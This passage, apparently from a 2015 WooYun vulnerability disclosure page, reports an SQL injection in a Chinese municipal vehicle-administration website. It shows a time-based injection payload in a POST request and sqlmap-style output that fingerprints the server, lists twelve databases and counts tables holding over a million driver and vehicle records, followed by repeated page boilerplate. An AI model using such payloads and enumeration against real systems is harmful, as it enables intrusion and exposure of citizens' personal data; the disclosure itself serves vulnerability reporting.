nAJ6I5XMeTBnghy66ZPsq1Szk&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx' WAITFOR DELA
Y '0:0:5'--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90
 %E4%BA%A4
---
[19:24:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:24:24] [INFO] fetching database names
[19:24:24] [INFO] fetching number of databases
[19:24:24] [INFO] resumed: 12
[19:24:24] [INFO] resumed: cgs
[19:24:24] [INFO] resumed: gongan
[19:24:24] [INFO] resumed: master
[19:24:24] [INFO] resumed: model
[19:24:24] [INFO] resumed: msdb
[19:24:24] [INFO] resumed: NewTripKH
[19:24:24] [INFO] resumed: NewTripMember
[19:24:24] [INFO] resumed: NewTripXB
[19:24:24] [INFO] resumed: sitecmstest
[19:24:24] [INFO] resumed: tempdb
[19:24:24] [INFO] resumed: wztest
[19:24:24] [INFO] resumed: xbtest
available databases [12]:
[*] cgs
[*] gongan
[*] master
[*] model
[*] msdb
[*] NewTripKH
[*] NewTripMember
[*] NewTripXB
[*] sitecmstest
[*] tempdb
[*] wztest
[*] xbtest

漏洞证明：

Database: cgs
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| dbo.Web_WeifaChe       | 1684209 |
| dbo.Web_drivingLicense | 1526014 |
| dbo.Web_VEHICLE        | 1113756 |
| dbo.Web_WeiFa          | 670576  |
| dbo.Web_drv_preasign   | 488730  |
| dbo.SMSSendLogs        | 448154  |
| dbo.SMSSentSave        | 448154  |
| dbo.View_1             | 32418   |
| dbo.WEB_XB             | 32395   |
| dbo.asks               | 25232   |
| dbo.JszEditApp         | 18020   |
| dbo.Web_User           | 12814   |
| dbo.Web_dataLog        | 9060    |
| dbo.WEB_XB_SMS         | 7539    |
| dbo.CarEditApp         | 6272    |
| dbo.webjianyi          | 1557    |
| dbo.CheSYAPP           | 541     |
| dbo.Web_JiaXiao        | 44      |
| dbo.Web_ztsm           | 31      |
| dbo.CheYYAPP           | 24      |
| dbo.JszYwApp           | 21      |
| dbo.Web_hospital       | 20      |
| dbo.Web_Cards          | 15      |
| dbo.Web_SqlLogs        | 14      |
| dbo.Web_Menu           | 13      |
| dbo.SMSConfig          | 8       |
| dbo.wsyytype           | 8       |
| dbo.dtproperties       | 7       |
| dbo.Web_DataConfig     | 5       |
| dbo.Web_Lasted_Up      | 5       |
| dbo.asktype            | 3       |
| dbo.ApiIpPass          | 2       |
| dbo.CheSYConfig        | 1       |
| dbo.Web_YouZheng       | 1       |
+------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-11-03 09:20

厂商回复：

感谢提交！！
验证确认所描述的问题，已通知其修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150710

漏洞标题：新乡市公安局车辆管理所某处SQL注入（目测全市车主信息）

相关厂商：新乡市公安局车辆管理所

漏洞作者：路人甲

提交时间：2015-10-31 10:57

修复时间：2015-12-18 09:20

公开时间：2015-12-18 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150710

漏洞标题：新乡市公安局车辆管理所某处SQL注入（目测全市车主信息）

相关厂商：新乡市公安局车辆管理所

漏洞作者： 路人甲

提交时间：2015-10-31 10:57

修复时间：2015-12-18 09:20

公开时间：2015-12-18 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(公安部一所)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0150710"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云